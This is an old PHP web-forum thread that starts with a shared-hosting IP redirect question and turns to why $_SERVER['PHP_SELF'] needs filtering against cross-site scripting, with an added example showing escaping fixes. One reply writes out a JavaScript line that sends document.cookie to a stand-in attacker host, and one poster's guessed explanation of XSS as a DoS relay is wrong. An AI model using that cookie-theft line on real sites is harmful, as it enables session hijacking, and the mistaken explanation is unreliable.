DNS and IP question
Posted: Wed Apr 05, 2006 8:40 pm
by alex.barylski
I just purchased a new shared host and did so by using some fake domain (something.com or something...) and my hosting company indeed used that name when they created my hosting account...
Now I don't NEED a domain name, just the shared host, and I figured I'd simply use the IP.
Obviously my software doesn't use any hardcoded URL and relies solely on $_SERVER['PHP_SELF'] or whatever that variable is (I can't remember)...
Whenever I type in my IP addy and click on a link I get redirected to that stupid domain name, and my software doesn't exist on that domain...
Can I get the hosting company to somehow disable that redirect?
Do I have to use a hardcoded URL in place of that variable?
Should I just purchase a domain name and use it???
Cheers

Posted: Thu Apr 06, 2006 2:36 am
by R4000
you have 4 options:
(I recommend 2)
- Hardcode the IP.
- Get a new host with a real domain.
- Buy the domain.
- Or ask your hosting company to give you a subdomain of their domain.
Posted: Thu Apr 06, 2006 2:47 am
by Maugrim_The_Reaper
A domain name maps to an IP (or at least one which will redirect to a shared IP's virtual host). Check you actually have your own dedicated IP for your account. It's not a given and may require a small additional charge.
$_SERVER['PHP_SELF'] - make sure you filter this

Posted: Thu Apr 06, 2006 4:59 am
by timvw
You can get a ton of free (sub) domains... eg: no-ip.info
Posted: Thu Apr 06, 2006 10:10 am
by Bill H
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
Posted: Thu Apr 06, 2006 10:29 am
by alex.barylski
Bill H wrote:$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
If I am right, however, I still fail to see why anyone would do such a thing...
It's not like spoofing IP addresses when trying to avoid IP ban scripts, or FORM submission when a web site only uses Javascript validation...
So yes, I'm curious too...why and when would you filter that server variable???

Posted: Thu Apr 06, 2006 10:48 am
by timvw
Hockey wrote:Bill H wrote:$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Posted: Thu Apr 06, 2006 10:54 am
by alex.barylski
timvw wrote:Hockey wrote:Bill H wrote:
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...
I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Ahhhhhhh...ok...well that's valid
However, my CMS application is, at the current time, for a single user only, and "every" action requires at least basic authentication - not incredibly secure, but given the circumstances it should be good enough.
Thanks for that heads up though, never even considered that before
Cheers

Posted: Thu Apr 06, 2006 11:03 am
by Bill H
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
Posted: Thu Apr 06, 2006 11:31 am
by alex.barylski
Bill H wrote:The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
I'm no expert in web security, but...
I'm guessing
PHP_SELF is initialized by looking at the script name stored in HTTP headers...
So I imagine that using SCRIPT_NAME or __FILE__ or something similar would be better, because they're likely initialized on the server, by the server, using environment variables, preventing outside tampering...
Would be my guess anyways...
I'm not totally clear on how XSS works, but I'm pretty sure it works like:
You use a variable like:
PHP_SELF inside FORM elements action attribute.
You don't hardcode the URL but simply do...
<form action="<?=$_SERVER['PHP_SELF'];?>">
<!-- ...various input elements, etc... -->
</form>
Someone could potentially use your web site now to carry out DoS attacks on another site...
All they would have to do is spoof
PHP_SELF to something like:
http://www.somedomain.com and submit that web site FORM which would send an HTTP GET/POST request to
http://www.somedomain.com instead of the intended website...
http://www.somedomain.com would then have a log of your web site sending abnormal amounts of requests to their web site, meanwhile you haven't done F' all but still get in trouble...and the script kiddy walks because he spoofs his own IP when calling your troubled script...
This is what I am guessing anyways...
If a script kiddy found enough sites with holes like this they could then possibly carry out DDoS attacks...which is more of a threat...
So I guess comparing
PHP_SELF to
SCRIPT_NAME or hardcoding a URL and just appending
PHP_SELF to it would likely fix that problem...
Of course this is all an educated guess...so if I'm wrong someone jump in and correct me...
I'm curious
p.s-
www.codeproject.com was hacked by a javascript programmer...the message forums allowed javascript and somehow someone figured out how to get a script to execute when their message was displayed...so they changed the URLs of the ad banners to some pornographic ad banners instead...whenever someone read their message or entire thread, I think it was
Bored or what??? Who thinks of these things

Posted: Thu Apr 06, 2006 1:10 pm
by timvw
I found the comments in http://shiflett.org/archive/98 quite informative...
Anyway, the easiest exploit I can think of is simply injecting some javascript like this:
window.location = 'http://evil.example.org/attack.php?cookie=' + document.cookie
Now attack.php knows the session_id and can easily perform actions on behalf of the victim.
Posted: Thu Apr 06, 2006 2:24 pm
by Bill H
Okay, now I'm going to the head of the "stupid" class, because I still don't have any idea of what is involved in filtering $_SERVER['PHP_SELF'].
Something about comparing it to the script it's running in... If I can do that, why do I need it at all? I'll just use the script name, right?
I have a form in a script that is going to be used by (included in) several different other scripts, thereby becoming part of the script that included it. Obviously, the <form> tag needs a differing "action" depending on the script that called it. It seems that $_SERVER['PHP_SELF'] is pretty much the obvious choice for that purpose, but you say I then need to "filter" that. Where do I filter it, what is meant by filtering it, and how do I go about doing it?
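An added example (not code from anyone in the thread) of what "filtering" PHP_SELF amounts to in practice: the unescaped form action beside a version run through htmlspecialchars, plus the SCRIPT_NAME alternative. $sample is a constructed stand-in for $_SERVER, populated the way a request for /form.php with a crafted PATH_INFO suffix would populate it.

```php
<?php
// Vulnerable: PHP_SELF includes whatever PATH_INFO the client appended to the URL,
// so a quote and angle brackets in the path break out of the action attribute.
function form_action_unsafe(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Hardened: HTML-escape the value before it lands inside the attribute.
// ENT_QUOTES also encodes single quotes, which matters for single-quoted attributes.
function form_action_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Alternative: SCRIPT_NAME is the script path alone, without the PATH_INFO suffix,
// so it still works when the form is included from several different scripts.
function form_action_script_name(array $server): string
{
    $name = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $name . '" method="post">';
}

// Constructed sample values (not a real request): the harmless <b> tag stands in
// for whatever markup a client could place in the path.
$sample = [
    'PHP_SELF'    => '/form.php/"><b>x</b>',
    'SCRIPT_NAME' => '/form.php',
];

echo form_action_unsafe($sample), "\n";      // attribute is closed early; markup is live
echo form_action_escaped($sample), "\n";     // quote and tags are encoded; inert text
echo form_action_script_name($sample), "\n"; // only the script path appears
```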
Posted: Thu Apr 06, 2006 2:27 pm
by feyd
It may be best to split this thread apart, one for PHP_SELF, and the rest stay. Anyone disagree?
Posted: Thu Apr 06, 2006 2:44 pm
by Bill H
Well, that was very polite, considering that I have brutally hijacked the thread about six nautical miles away from the original topic. It was not deliberate. Hmmm. PHP Code perhaps? I'll post it there.